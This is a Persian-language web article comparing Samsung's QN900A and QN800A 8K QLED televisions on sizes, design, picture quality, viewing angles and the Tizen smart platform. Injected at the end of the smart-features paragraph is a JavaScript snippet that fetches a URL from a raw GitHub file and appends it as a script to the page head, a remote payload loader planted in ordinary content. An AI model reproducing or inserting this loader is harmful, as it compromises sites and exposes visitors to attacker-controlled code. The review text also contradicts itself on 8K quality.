دسته‌بندی نشده

مقایسه تلویزیون های 8K سامسونگ QN900A و QN800A

در رده بندی های سامسونگ تلویزیون کیولد QN900A 8k بالاتر از QN800A 8k قرار می گیرد. این تلویزیون تقریبا به شیوه های مشابه ساخته شده اند اما در برخی ویژگی های کلیدی با یکدیگر تفاوت دارند. تلویزیون QN900A دارای فریم های باریک است و از ویژگی هایی مانند لوکال دیمینگ و سرعت پاسخگویی بالا برخوردار است همچنین تلویزیون QN800A در محتویات SDR و HDR روشنایی بالاتری ارائه می دهد. 

سایز های ارائه شده 

برای هر دو تلویزیون QLED سامسونگ اینچ های مشابهی ارائه شده است. هر دو تلویزیون QN800A و QN900A مناسب برای استفاده در سالن های بزرگ با متراژ های بالا می باشند. اینچ های ارائه شده در این دو تلویزیون 65 اینچ, 75 اینچ و 85 اینچ می باشند.  سالن های مناسب جهت استفاده از این تلویزیون ها را می توانید در لینک زیر مشاهده فرمایید.

انتخاب تلویزیون مناسب برای سالن و خانه ها

طراحی و نحو ساخت 

تلویزیون کیولد سامسونگ QN900A با QN800A 8k QLED طراحی همسان و مشابهی دارند تلویزیون QN900A  نمایشگر باریک تری دارد و اطراف ان از فریم های بسیار باریک و غیر قابل مشاهده استفاده شده است و می توان گفت تلویزیونی بسیار زیبا با جلوه جذاب محسوب می شود. تلویزیون QN800A دارای طراحی ارتقا یافته از تلویزیون 2020 سامسونگ Q800T می باشد. این تلویزیون طراحی ممتازی دارد و بر روی ان یک تنظیم کننده کابل وجود دارد که تمامی سیم ها و کابل ها داخل ان به اسانی قرار می گیرند. QN900A دارای پایه مرکزی است که روی سطوح مختلف قرار می گیرد و نیاز به فضای زیادی ندارد. این پایه تلویزیون را به خوبی نگه می دارد و دارای Connect box است که می توان تمامی کابل و سیم ها را داخل ان قرار داد و از ایجاد هرج و مرج و بی نظمی ظاهری تلویزیون جلوگیری کرد. قسمت پشتی این تلویزیون ها از جنس پلاستیک است و از مقاومت بالایی برخوردار هستند. فریم های تلویزیون QN900A ابعاد کمتری دارند و در سه طرف از تلویزیون حاشیه های بسیار باریکی استفاده شده است که به سختی قابل مشاهده می باشد. ابعاد این فریم ها 0.2 سانتی متر است در صورتی که در تلویزیون QN800A ابعاد 0.9 سانتی متری استفاده شده است. QN900A باریک ترین تلویزیون از سامسونگ می باشد. ابعاد این تلویزیون 1.6 سانتی متر است در صورتی که QN800A قطر بیشتری دارد و حدود 2.1 سانتی متر ضخامت دارد. 

کیفیت تصویر و ویژگی های تصویری

هر دو این تلویزیون های با کیفیت 8K عرضه شده اند. نحو نمایش محتویات 8K بر روی این تلویزیون ها خوب و مناسب است اما بی عیب و نقص نمی باشد و دارای ایراداتی در وضوح و نمایش دقیق اجزا و افراد موجود در تصویر می باشد. اگر می خواهید یک تلویزیون 8K واقعی بدون کوچک ترین ایرادی در نمایش خریداری کنید QN800A گزینه ای مناسب و کاربردی می باشد. محتویات فورکی بر روی این تلویزیون ها به خوبی ارتقا داده نمی شوند و ایراداتی جرئی در ارتقا ان ها بچشم می خورد. محتویات 1080p بر روی هر دو تلویزیون به خوبی و به بهترین شیوه ارتقا داده می شوند و هیچ مشکلی در نمایش محتویات 1080p کنسول های بازی در ان ها وجود ندارد. محتوا 720p و 480p که از طریق کابل انتقال می یابند نیز به خوبی ارتقا داده خواهند شد. از نظر نسبت کنتراست QN800A عملکردی عالی و بسیار بهتر از QN900A دارد. 

زاویه دید و کنترل انعکاس

از نظر زاویه دید تلویزیون QN900A عملکردی مناسب دارد. تصاویر در زوایا به خوبی نمایش داده می شوند اگرچه تا حدی دچار افت کیفیت خواهند شد اما هنوز نسبت به پنل های VA به دلیل بهره گیری از تکنولوژی زاویه دید گسترده اختصاصی سامسونگ عملکردی مناسب دارند. علارغم بهره گیری تلویزیون QN800A از تکنولوژی زاویه دید گسترده از نظر زاویه دید این تلویزیون عملکردی عادی دارد و تصاویر در قسمت های حاشیه ای تا حدی دچار افت کیفیت می شوند. اگر به دنبال تلویزیون 8K با زاویه دید گسترده هستید مدل QN85A عملکردی عالی و خشنود کننده دارد. هر دو این تلویزیون ها از نظر انعکاس و بازتاب نور عملکردی عالی دارند و در برابر تابش مستقیم نور نیز می توانند به صورتی فوق العاده عمل کنند. 

قابلیت های اسمارت

برای تلویزیون های کیولد QN900A و QN800A سامسونگ از سیستم عامل اختصاصی این برند تایزن Tizen ورژن 2021 استفاده شده است. استفاده از این پلتفرم بسیار اسان و کاربردی است و منو فوق العاده عالی با تنوع بالا دارد. کارکرد تایزن در هر دو تلویزیون بسیار روان و فوق العاده حساس می باشد. تعداد اپلیکیشن ها عرضه شده و قابل اجرا برای این دو تلویزیون بسیار زیاد می باشند.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *